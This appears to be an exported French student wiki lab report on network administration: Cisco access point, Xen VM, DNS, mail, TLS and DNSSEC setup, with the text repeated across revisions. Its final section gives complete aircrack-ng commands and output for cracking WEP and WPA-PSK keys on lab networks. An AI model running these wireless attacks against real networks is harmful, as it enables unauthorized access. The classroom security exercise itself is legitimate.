<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35660TP sysres IMA2a5 2016/2017 G42016-12-06T11:11:13Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
<br />
<TABLE BORDER="1"> <br />
<CAPTION> Récapitulatif des IP </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TD> VLAN20 </TD> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN21 </TD> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN22 </TD> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR><br />
<TR> <br />
<TD> VLAN23 </TD> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN24 </TD> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TR><br />
<TD> VLAN25 </TD> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
